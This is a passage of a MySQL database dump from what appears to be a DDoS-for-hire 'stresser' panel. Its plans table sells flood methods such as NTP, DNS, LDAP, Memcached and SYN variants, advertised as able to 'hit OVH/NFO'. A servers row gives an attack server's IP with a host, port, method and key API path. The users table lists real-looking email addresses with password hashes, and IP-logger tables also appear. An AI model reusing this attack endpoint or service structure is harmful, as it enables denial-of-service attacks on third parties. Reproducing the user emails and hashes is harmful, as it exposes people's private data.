689(7, '3b4356ff26b6354be8b88018b5d04f3d', 2, 7, 1569035057, 1),
690(8, '0dbf36975cc8df9b9b6278616877f848', 4, 8, 1569035433, 1),
691(9, '165560af8cf1c881489d83b0d9c641ac', 4, 9, 1569035892, 1),
692(10, '7637a5030410bff81d8cfa26316402a0', 1, 10, 1569036204, 1),
693(11, 'c899a0d6287be0b4090719ea958325e8', 4, 11, 1569036339, 1),
694(12, '7b01e153970f30323e1a0863beb24782', 4, 12, 1569036394, 1),
695(13, '76054d8a441802b0d7bf14d22069c948', 4, 13, 1569109330, 1),
696(14, '2f4be9fc76f00ef01756c61249903295', 1, 14, 1569109346, 1),
697(15, '505c54c4f43a6e15232e2511a08eb3a8', 4, 15, 1569109392, 1),
698(16, '21b31d1843903fc6a4d42edb408e341a', 1, 16, 1569109402, 1),
699(17, 'd922555572f12c2fa5e44154c6d5ee9e', 1, 17, 1569109483, 1),
700(18, '497244248dfb4de1024aaa114b7b6503', 4, 18, 1569109876, 1),
701(19, '4e7b843c7cff15f8a93ae12972fa0253', 4, 19, 1569110020, 1),
702(20, '9e918fedbf4cc6c3a7ef67fe7df6ab18', 4, 20, 1569110451, 1),
703(21, 'b5509e855a6b0e743ef16f0902ec2d91', 12, 21, 1569114408, 1),
704(22, 'a035c85db7b975c55418c248e08a17d9', 12, 22, 1569114450, 1),
705(23, '5ff26de05265981db3e726e2b1faceee', 14, 23, 1569114964, 1),
706(24, '1b4574ee9c71483dd070aceb37a38863', 14, 24, 1569117169, 1),
707(25, 'f4692b55fb21bc826cf7bc72c80775e3', 4, 25, 1569119521, 1),
708(26, '1b0a527269030a036624a5ca9fe39003', 4, 26, 1569119549, 1),
709(27, '3d59de832dc1224a9a2bc3587d42a3d3', 4, 27, 1569120615, 1),
710(28, 'abcaa1403faa1ab0737c19a9270181ba', 4, 28, 1569120732, 1),
711(29, '440745dfcbeafe155ab926e97ee52706', 4, 29, 1569120835, 1),
712(30, '0263311137addec407edeb4e7a953157', 1, 30, 1569120919, 1),
713(31, '41a8577b63c56d496956b5028b5d11b2', 1, 31, 1569124226, 1),
714(32, 'b30b9d6a15f4867dfe514159b7cdaece', 4, 32, 1569128428, 1),
715(33, '7183eaf1161b2a5723906474e4ac7cfc', 1, 33, 1569128593, 1),
716(34, 'b4729377d1adbe1c840fbeeafd10f3db', 1, 34, 1569129950, 1),
717(35, '54fc6df15770620dfc1dfb60d2b6729e', 1, 35, 1569130077, 1),
718(36, 'b0502f0462cf9152689dd2a15b0a9192', 1, 36, 1569130134, 1),
719(37, '54ff420112d8d19a202f78a7a1c8942c', 1, 37, 1569130187, 1),
720(38, 'b2f40b0b58f2544af36efa2fb0879e1e', 4, 38, 1569171438, 1),
721(39, '0dc4bd45c0a94de15690a1b3cb29ba4f', 1, 39, 1569191254, 1),
722(40, 'aba751fb6db1e8d9304bab76687ea68e', 1, 40, 1569191315, 1),
723(41, '67a2b0142f521a4a6f6ee24bc3e306f9', 1, 41, 1569195487, 1),
724(42, 'c9eac064e62f7da5e7b75e99551f77e7', 18, 42, 1569198236, 1),
725(43, '6d60a16a6ed4e08eddcbf441c8c02612', 18, 43, 1569198471, 1),
726(44, 'b4864d844583f66b9543439cbab809a2', 18, 44, 1569198564, 1),
727(45, 'bc828f4b796c8dcb1270024c8dfd03ea', 18, 45, 1569198873, 1),
728(46, '37019dc994e3d6775bf1e20e7e9e1994', 18, 46, 1569198926, 1),
729(47, '1bd1edf9d00528c2b62f1a931317b56b', 18, 47, 1569199004, 1),
730(48, '10a258d2ad1bcda4df8c9902799120c3', 18, 48, 1569199538, 1),
731(49, 'a3bf9796757ddf1d50f84b5809b26fb0', 18, 49, 1569199619, 1),
732(50, '2e3998e797e621b93e264cfb7c2e048d', 18, 50, 1569199692, 1),
733(51, '82bc31bcad3f6b909f3166d531ec6a74', 18, 51, 1569203699, 1),
734(52, 'c48fb9cef5ab23b33f09bcc70ec9a385', 18, 52, 1569203772, 1),
735(53, '16acd15d1ac8e1f19e88b1a21c8f3e8b', 18, 53, 1569203837, 1),
736(54, 'c5c3152470abfcf8770136a89a3fc871', 18, 54, 1569204020, 1),
737(55, '8a1e0d7ea292e9520ba572ad2eb8d59f', 18, 55, 1569204237, 1),
738(56, 'b9f8e47267f3151430380642cf46806b', 4, 56, 1569207909, 1),
739(57, '4c57d3644e05fc520e722d646d1e0e37', 4, 57, 1569208195, 1),
740(58, 'b8c574b00054d20d316e99f5eda37465', 1, 58, 1569215974, 1),
741(59, '50ee77186d08c5780770658135036c83', 1, 59, 1569216035, 1),
742(60, '97ca23926d11c46981885fced81501bd', 16, 60, 1569216047, 1),
743(61, '0a6a0965ad2e3916bfbf7fef8f07d16b', 1, 61, 1569216090, 1),
744(62, '9d53b9b7062e1a8767881c3bef2efc3a', 1, 62, 1569216151, 1),
745(63, 'cd802f210ba56e454245f03adbddbf1c', 16, 63, 1569216175, 1),
746(64, 'a297048b153cc8b9c02a0e7de8af2fdd', 1, 64, 1569216206, 1),
747(65, '3c83f87cf4086d8b623b5106e41c1294', 1, 65, 1569216281, 1),
748(66, '8802ae1b20be22fbc3f5109772bd9c9d', 12, 66, 1569218356, 1),
749(67, '57f191b54610040f3114bd6b9b0296ed', 16, 67, 1569218508, 1),
750(68, '982d1ac81d9adbe94f5c1f67730c0ece', 1, 68, 1569250988, 1),
751(69, 'c6cd1c43f859e81156be804d47c9687f', 1, 69, 1569252187, 1),
752(70, '32f868fdc2ea78229624dd29df7f8e00', 1, 70, 1569252224, 1),
753(71, '8011d7debd3b865297ed69d015e729e9', 1, 71, 1569258373, 1);
754
755-- --------------------------------------------------------
756
757--
758-- Table structure for table `plans`
759--
760
761CREATE TABLE IF NOT EXISTS `plans` (
762`ID` int(11) NOT NULL,
763 `name` varchar(50) NOT NULL,
764 `description` text NOT NULL,
765 `mbt` int(11) NOT NULL,
766 `max_boots` tinyint(2) NOT NULL DEFAULT '1',
767 `unit` varchar(10) NOT NULL,
768 `length` int(11) NOT NULL,
769 `price` float NOT NULL,
770 `allowed_methods` text
771) ENGINE=MyISAM AUTO_INCREMENT=16 DEFAULT CHARSET=latin1;
772
773--
774-- Dumping data for table `plans`
775--
776
777INSERT INTO `plans` (`ID`, `name`, `description`, `mbt`, `max_boots`, `unit`, `length`, `price`, `allowed_methods`) VALUES
778(8, '[TXTG]', 'TXTG', 86400, 3, 'Years', 1, 900, 'ZAP,DNS,BLUESYN,XMAS,SUDP,TILERA,OVH,VSE,REDSYN,PROWIN,WINSYN,LDAP,SSDP,ACK,WIZARD,VOX,PPTP,UBNT,TELNET,MAC,MEMCACHED,NTP,DOMINATE,BO4BYPASS,FAST,GREENSYN,BLAZIN,URG'),
779(9, '[Starter]', 'JOIN FOR THE NEW BOOTERS', 300, 1, 'Months', 1, 5, 'DNS,LDAP,SSDP,ACK,WIZARD,VOX,NTP,FAST'),
780(10, 'PRO', 'YOU GETTING THERE', 730, 1, 'Months', 1, 9, 'ZAP,DNS,BLUESYN,XMAS,SUDP,LDAP,SSDP,ACK,WIZARD,NTP,FAST,URG'),
781(11, 'EXPERT', 'NOW U SLAMMING', 1000, 1, 'Months', 1, 15, 'ZAP,DNS,XMAS,SUDP,VSE,LDAP,SSDP,ACK,WIZARD,VOX,PPTP,MAC,NTP,DOMINATE,FAST,URG'),
782(12, '[OVH & PLAN] 1', 'Buy This Plan U Will Be Sent OVH', 1300, 2, 'Months', 2, 20, 'ZAP,DNS,BLUESYN,XMAS,SUDP,TILERA,OVH,VSE,REDSYN,PROWIN,WINSYN,LDAP,SSDP,ACK,WIZARD,VOX,PPTP,UBNT,TELNET,MAC,MEMCACHED,NTP'),
783(13, '[OVH & PLAN] 2', 'Get OVH And Have The Power To Hit OVH/NFO', 1600, 2, 'Months', 2, 26, 'ZAP,DNS,BLUESYN,XMAS,SUDP,TILERA,OVH,VSE,REDSYN,PROWIN,WINSYN,LDAP,SSDP,ACK,WIZARD,VOX,PPTP,TELNET,MAC'),
784(14, '[OVH & PLAN] 3 ', 'U Now Have Full Power With An OVH', 2000, 2, 'Months', 2, 30, 'ZAP,DNS,BLUESYN,XMAS,SUDP,TILERA,OVH,VSE,REDSYN,PROWIN,WINSYN,LDAP,SSDP,ACK,WIZARD,VOX,PPTP,UBNT,TELNET,MAC,MEMCACHED,NTP,DOMINATE,BO4BYPASS,FAST,GREENSYN,BLAZIN,URG'),
785(15, '(CUSTOM) 1', 'HMU N U ILL GET A CUSTON PLAY', 2000, 3, 'Months', 2, 20, 'ZAP,DNS,BLUESYN,XMAS,SUDP,TILERA,OVH,VSE,REDSYN,PROWIN,WINSYN,LDAP,SSDP,ACK,WIZARD,VOX,PPTP,UBNT,TELNET,MAC,MEMCACHED,NTP,DOMINATE,BO4BYPASS,FAST,GREENSYN,BLAZIN,URG');
786
787-- --------------------------------------------------------
788
789--
790-- Table structure for table `servers`
791--
792
793CREATE TABLE IF NOT EXISTS `servers` (
794`id` int(11) NOT NULL,
795 `name` varchar(64) NOT NULL,
796 `addr` varchar(128) NOT NULL,
797 `resource` varchar(512) NOT NULL,
798 `description` text,
799 `strength` varchar(256) DEFAULT NULL,
800 `last_used` int(16) NOT NULL,
801 `status` enum('good','caution','gone') NOT NULL DEFAULT 'gone',
802 `delay` varchar(10) NOT NULL DEFAULT '0',
803 `active` enum('0','1') NOT NULL DEFAULT '1'
804) ENGINE=InnoDB AUTO_INCREMENT=13 DEFAULT CHARSET=latin1;
805
806--
807-- Dumping data for table `servers`
808--
809
810INSERT INTO `servers` (`id`, `name`, `addr`, `resource`, `description`, `strength`, `last_used`, `status`, `delay`, `active`) VALUES
811(12, '2Servers', 'http://147.135.237.1', '/jebobo/server.php?host=%host%&method=%method%&port=%port%&time=%time%&key=TXTG', 'TXTGSTRESSER', '12gbps', 1569258373, 'caution', '0', '1');
812
813-- --------------------------------------------------------
814
815--
816-- Table structure for table `tickets`
817--
818
819CREATE TABLE IF NOT EXISTS `tickets` (
820`id` int(11) NOT NULL,
821 `subject` varchar(64) NOT NULL,
822 `context` text NOT NULL,
823 `status` varchar(30) NOT NULL,
824 `username` varchar(15) NOT NULL,
825 `date` int(16) DEFAULT NULL
826) ENGINE=InnoDB AUTO_INCREMENT=10 DEFAULT CHARSET=latin1;
827
828--
829-- Dumping data for table `tickets`
830--
831
832INSERT INTO `tickets` (`id`, `subject`, `context`, `status`, `username`, `date`) VALUES
833(3, 'my servers are not connecting', 'test', 'Closed', 'deonteworthen', 1569033110),
834(4, 'my servers are not connecting', 'test', 'Closed', 'deonteworthen', 1569033123),
835(5, 'Hi ', 'Yo ', 'Closed', 'DROPPEDWIFI25', 1569033139),
836(6, 'subject', 'texthere', 'Closed', 'iamtesting', 1569053245),
837(7, 'open', 'open', 'Closed', 'iamtesting', 1569054966),
838(8, 'subject', 'text', 'Closed', 'iamtesting', 1569060532),
839(9, 'subject', 'test', 'Closed', 'iamtesting', 1569060835);
840
841-- --------------------------------------------------------
842
843--
844-- Table structure for table `users`
845--
846
847CREATE TABLE IF NOT EXISTS `users` (
848`ID` int(11) NOT NULL,
849 `username` varchar(26) NOT NULL,
850 `password` varchar(40) NOT NULL,
851 `email` varchar(50) NOT NULL,
852 `rank` int(11) NOT NULL DEFAULT '0',
853 `membership` int(11) NOT NULL,
854 `max_boots` tinyint(2) NOT NULL DEFAULT '0',
855 `expire` int(11) NOT NULL,
856 `status` int(11) NOT NULL,
857 `test_boot` int(16) DEFAULT NULL
858) ENGINE=MyISAM AUTO_INCREMENT=32 DEFAULT CHARSET=latin1;
859
860--
861-- Dumping data for table `users`
862--
863
864INSERT INTO `users` (`ID`, `username`, `password`, `email`, `rank`, `membership`, `max_boots`, `expire`, `status`, `test_boot`) VALUES
865(1, 'txtgleader', '3a9f35139ab437b00ee9395e7dc611c55a527962', 'txtgserver123@gmail.com', 1, 8, 0, 1600731648, 0, NULL),
866(2, 'undoxity', '14e68b0c45ebe2bba4c9c4706ff08f602802729e', 'undoxity@undoxity.undoxity', 1, 8, 0, 1600731668, 0, NULL),
867(3, 'TXTGNotLackin', '8f36fc080fd9581613e72e35afb3df40c74889a8', 'Koryman3@gmail.com', 0, 4, 0, 1632191711, 0, NULL),
868(4, 'deonteworthen', 'c522c3c25b5876ecf0b8435594883956db9a112a', 'deonteworthen45@gmail.com', 0, 8, 0, 1600731630, 0, NULL),
869(5, 'DROPPEDWIFI25', '8366d2b1a8a75b792c22632380b4bb409bcae287', 'Johnsonkemonty@gmail.com', 0, 4, 0, 1632191735, 0, NULL),
870(6, 'undoxitytest', '14e68b0c45ebe2bba4c9c4706ff08f602802729e', 'undoxitytest@gmail.com', 0, 0, 0, 0, 0, NULL),
871(7, 'Anonymous123', '4970d47daf0d8c0cec471e29063640fa6900f109', 'bigdadaylouvcscuck@cuckme.com', 0, 0, 0, 0, 0, NULL),
872(8, 'harmz', '07ee54b7a941698180c8b3956ff5fc44da3296e9', 'ndfanarchy@gmail.com', 0, 0, 0, 0, 0, NULL),
873(9, 'UltraFerrox', 'd84646d0c3f2cf65840883947a0127852b864371', 'wlbferrox@gmail.com', 0, 0, 0, 0, 0, NULL),
874(10, 'Chubu', '11306465f1be036909d8d56ab42e184da9b78a1f', 'Marque006@icloud.com', 0, 0, 0, 0, 0, NULL),
875(11, 'iamtesting', 'a516ac182010af74b262361cde1aa2200be80deb', 'lol@lol.com', 0, 0, 0, 0, 0, NULL),
876(12, 'CaronModzAll', 'ec5ef1f7afbc3efb1d2a34efce7e5cde67dd39fc', 'justingmodz0922@gmail.com', 0, 9, 0, 1571706334, 0, NULL),
877(13, 'InsanityBoii', 'e91079668e34c7460a04cb149ad2944427c44884', 'jadelo@bellsouth.net', 0, 0, 0, 0, 0, NULL),
878(14, 'TxtgH3ADSHOT', '6d9633ddbf3c7649164d343feab0aef6a84d9af5', 'Txtggang24@gmail.com', 0, 8, 0, 1600735282, 0, NULL),
879(15, 'Davezn6', '9cb3b9075f3e4a8b2697d9a9d2de67b3c7e62129', 'ducttape336@gmail.com', 0, 0, 0, 0, 0, NULL),
880(16, 'treyyoung', '8be158338a7d5dbb83b10fe8627da5d4e6d147b7', 'txtggang17@yopmail.com', 0, 8, 0, 1600741950, 0, NULL),
881(17, 'TXTGQueen', 'acbc653fe26427498cbae866b0dcd9a7f5ff419d', 'breezy7984@gmail.com', 0, 8, 0, 1600742914, 0, NULL),
882(18, 'Frosty', '9a749ca9f9f50ad98965cf6e6f80674d075077ad', 'flakesfrosty24@gmail.com', 0, 14, 0, 1574472573, 0, NULL),
883(19, 'V2680', '0fb2123376ad529ab325c8eb1cb87e4d17fe48e0', 'V2680l@protonmail.com', 0, 0, 0, 0, 0, NULL),
884(20, 'Turn', '721bc55662bf83896a513906ccd6c1f7a42ef9e5', 'Katesmall395@gmail.com', 0, 0, 0, 0, 0, NULL),
885(21, 'ShalXBL', '7dee76d7016d3837ef4fa281f75c255163c24a58', 'shalgfx420@gmail.com', 0, 0, 0, 0, 0, NULL),
886(22, 'Diamondshot', '833e9d618290f0da41af28bd621628b504a894da', 'TxtgDiamondshot21@gmail.com', 0, 0, 0, 0, 0, NULL),
887(23, 'Vivian', 'd886b32901097b42c49cb6bc69d79e0e6301cc3c', 'cybermandex420@protonmail.com', 0, 0, 0, 0, 0, NULL),
888(24, 'Stadics', '4a0e2c5405a242252e1c1b039cb0be2c1ce30c27', 'xrayleo9@gmail.com', 0, 0, 0, 0, 0, NULL),
889(25, 'acaudill7', '8df59a5db9d8ff69fafe883a6a7d826358ec7e45', 'syrnpanda@gmail.com', 0, 0, 0, 0, 0, NULL),
890(26, 'loler44', '004d0c112fb9325a77799b73d67d90bd249522d9', 'elderscrollsguy12@gmail.com', 0, 0, 0, 0, 0, NULL),
891(27, 'tylerj101998', 'bf906f284b5cddd4b04efde3c4ba001252ca764e', 'tylerj101998badass@gmail.com', 0, 0, 0, 0, 0, NULL),
892(28, 'zxntrix', '223e0ad70fbd77109e7ece8878eeb752f82c57db', 'zxntrix@gmail.com', 0, 0, 0, 0, 0, NULL),
893(29, 'BluesBros0511', 'e8d86e86aeebbd5e94950f28113d9fb7546c56bc', 'Joshuadavis09@gmail.com', 0, 0, 0, 0, 0, NULL),
894(30, 'Uk720', '212b73a4f870fd48c84d1f3909ad5bd2b0ec820d', 'Uk720@gmail.com', 0, 0, 0, 0, 0, NULL),
895(31, 'youregoingdown', '2e13c3a7723ca3b13fc1a8f7150882c8c6e739dd', 'youregoingdown@gg.net', 0, 0, 0, 0, 0, NULL);
896
897-- --------------------------------------------------------
898
899--
900-- Table structure for table `users_fucked`
901--
902
903CREATE TABLE IF NOT EXISTS `users_fucked` (
904`ID` int(11) NOT NULL,
905 `username` varchar(26) NOT NULL,
906 `password` varchar(40) NOT NULL,
907 `email` varchar(50) NOT NULL,
908 `rank` int(11) NOT NULL DEFAULT '0',
909 `membership` int(11) NOT NULL,
910 `max_boots` tinyint(2) NOT NULL DEFAULT '0',
911 `expire` int(11) NOT NULL,
912 `status` int(11) NOT NULL,
913 `test_boot` int(16) DEFAULT NULL
914) ENGINE=MyISAM DEFAULT CHARSET=latin1;
915
916-- --------------------------------------------------------
917
918--
919-- Table structure for table `users_loggers`
920--
921
922CREATE TABLE IF NOT EXISTS `users_loggers` (
923`id` int(11) NOT NULL,
924 `logger_id` int(11) NOT NULL,
925 `user_id` int(11) NOT NULL,
926 `name` varchar(64) DEFAULT NULL,
927 `minified_url` varchar(256) DEFAULT NULL,
928 `date` int(16) NOT NULL
929) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=latin1;
930
931--
932-- Dumping data for table `users_loggers`
933--
934
935INSERT INTO `users_loggers` (`id`, `logger_id`, `user_id`, `name`, `minified_url`, `date`) VALUES
936(1, 4, 4, 'lol', NULL, 1569034259);
937
938--
939-- Indexes for dumped tables
940--
941
942--
943-- Indexes for table `blacklist`
944--
945ALTER TABLE `blacklist`
946 ADD PRIMARY KEY (`ID`);
947
948--
949-- Indexes for table `boot_methods`
950--
951ALTER TABLE `boot_methods`
952 ADD UNIQUE KEY `method` (`method`);
953
954--
955-- Indexes for table `fe`
956--
957ALTER TABLE `fe`
958 ADD PRIMARY KEY (`ID`);
959
960--
961-- Indexes for table `iplogs`
962--
963ALTER TABLE `iplogs`
964 ADD PRIMARY KEY (`ID`), ADD KEY `ID` (`ID`);
965
966--
967-- Indexes for table `loggers`
968--
969ALTER TABLE `loggers`
970 ADD PRIMARY KEY (`logger_id`), ADD UNIQUE KEY `address` (`address`);
971
972--
973-- Indexes for table `loggers_ips`
974--
975ALTER TABLE `loggers_ips`
976 ADD PRIMARY KEY (`id`);
977
978--
979-- Indexes for table `login_history`
980--
981ALTER TABLE `login_history`
982 ADD PRIMARY KEY (`id`), ADD KEY `username` (`username`,`ip`);
983
984--
985-- Indexes for table `logs`
986--
987ALTER TABLE `logs`
988 ADD PRIMARY KEY (`ID`);
989
990--
991-- Indexes for table `messages`
992--
993ALTER TABLE `messages`
994 ADD PRIMARY KEY (`messageid`);
995
996--
997-- Indexes for table `news`
998--
999ALTER TABLE `news`
1000 ADD PRIMARY KEY (`ID`);
1001
1002--
1003-- Indexes for table `payments`
1004--
1005ALTER TABLE `payments`
1006 ADD PRIMARY KEY (`ID`);
1007
1008--
1009-- Indexes for table `ping_tokens`
1010--
1011ALTER TABLE `ping_tokens`
1012 ADD PRIMARY KEY (`pt_id`), ADD UNIQUE KEY `token` (`token`);
1013
1014--
1015-- Indexes for table `plans`
1016--
1017ALTER TABLE `plans`
1018 ADD PRIMARY KEY (`ID`);
1019
1020--
1021-- Indexes for table `servers`
1022--
1023ALTER TABLE `servers`
1024 ADD PRIMARY KEY (`id`), ADD KEY `name` (`name`,`addr`);
1025
1026--
1027-- Indexes for table `tickets`
1028--
1029ALTER TABLE `tickets`
1030 ADD PRIMARY KEY (`id`);
1031
1032--
1033-- Indexes for table `users`
1034--
1035ALTER TABLE `users`
1036 ADD PRIMARY KEY (`ID`), ADD KEY `ID` (`ID`);
1037
1038--
1039-- Indexes for table `users_fucked`
1040--
1041ALTER TABLE `users_fucked`
1042 ADD PRIMARY KEY (`ID`), ADD KEY `ID` (`ID`);
1043
1044--
1045-- Indexes for table `users_loggers`
1046--
1047ALTER TABLE `users_loggers`
1048 ADD PRIMARY KEY (`id`);
1049
1050--
1051-- AUTO_INCREMENT for dumped tables
1052--
1053
1054--
1055-- AUTO_INCREMENT for table `blacklist`
1056--
1057ALTER TABLE `blacklist`
1058MODIFY `ID` int(11) NOT NULL AUTO_INCREMENT;
1059--
1060-- AUTO_INCREMENT for table `fe`
1061--
1062ALTER TABLE `fe`
1063MODIFY `ID` int(11) NOT NULL AUTO_INCREMENT;
1064--
1065-- AUTO_INCREMENT for table `iplogs`
1066--
1067ALTER TABLE `iplogs`
1068MODIFY `ID` int(11) NOT NULL AUTO_INCREMENT;
1069--
1070-- AUTO_INCREMENT for table `loggers`
1071--
1072ALTER TABLE `loggers`
1073MODIFY `logger_id` int(11) NOT NULL AUTO_INCREMENT,AUTO_INCREMENT=6;
1074--
1075-- AUTO_INCREMENT for table `loggers_ips`
1076--
1077ALTER TABLE `loggers_ips`
1078MODIFY `id` int(11) NOT NULL AUTO_INCREMENT,AUTO_INCREMENT=3;
1079--
1080-- AUTO_INCREMENT for table `login_history`
1081--
1082ALTER TABLE `login_history`
1083MODIFY `id` int(11) NOT NULL AUTO_INCREMENT,AUTO_INCREMENT=119;
1084--
1085-- AUTO_INCREMENT for table `logs`
1086--
1087ALTER TABLE `logs`
1088MODIFY `ID` int(11) NOT NULL AUTO_INCREMENT,AUTO_INCREMENT=72;
1089--
1090-- AUTO_INCREMENT for table `messages`
1091--
1092ALTER TABLE `messages`
1093MODIFY `messageid` int(11) NOT NULL AUTO_INCREMENT,AUTO_INCREMENT=211;
1094--
1095-- AUTO_INCREMENT for table `news`
1096--
1097ALTER TABLE `news`
1098MODIFY `ID` int(11) NOT NULL AUTO_INCREMENT,AUTO_INCREMENT=2;
1099--
1100-- AUTO_INCREMENT for table `payments`
1101--
1102ALTER TABLE `payments`
1103MODIFY `ID` int(11) NOT NULL AUTO_INCREMENT;
1104--
1105-- AUTO_INCREMENT for table `ping_tokens`
1106--
1107ALTER TABLE `ping_tokens`
1108MODIFY `pt_id` int(11) NOT NULL AUTO_INCREMENT,AUTO_INCREMENT=72;
1109--
1110-- AUTO_INCREMENT for table `plans`
1111--
1112ALTER TABLE `plans`
1113MODIFY `ID` int(11) NOT NULL AUTO_INCREMENT,AUTO_INCREMENT=16;
1114--
1115-- AUTO_INCREMENT for table `servers`
1116--
1117ALTER TABLE `servers`
1118MODIFY `id` int(11) NOT NULL AUTO_INCREMENT,AUTO_INCREMENT=13;
1119--
1120-- AUTO_INCREMENT for table `tickets`
1121--
1122ALTER TABLE `tickets`
1123MODIFY `id` int(11) NOT NULL AUTO_INCREMENT,AUTO_INCREMENT=10;
1124--
1125-- AUTO_INCREMENT for table `users`
1126--
1127ALTER TABLE `users`
1128MODIFY `ID` int(11) NOT NULL AUTO_INCREMENT,AUTO_INCREMENT=32;
1129--
1130-- AUTO_INCREMENT for table `users_fucked`
1131--
1132ALTER TABLE `users_fucked`
1133MODIFY `ID` int(11) NOT NULL AUTO_INCREMENT;
1134--
1135-- AUTO_INCREMENT for table `users_loggers`
1136--
1137ALTER TABLE `users_loggers`
1138MODIFY `id` int(11) NOT NULL AUTO_INCREMENT,AUTO_INCREMENT=2;
1139/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
1140/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
1141/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;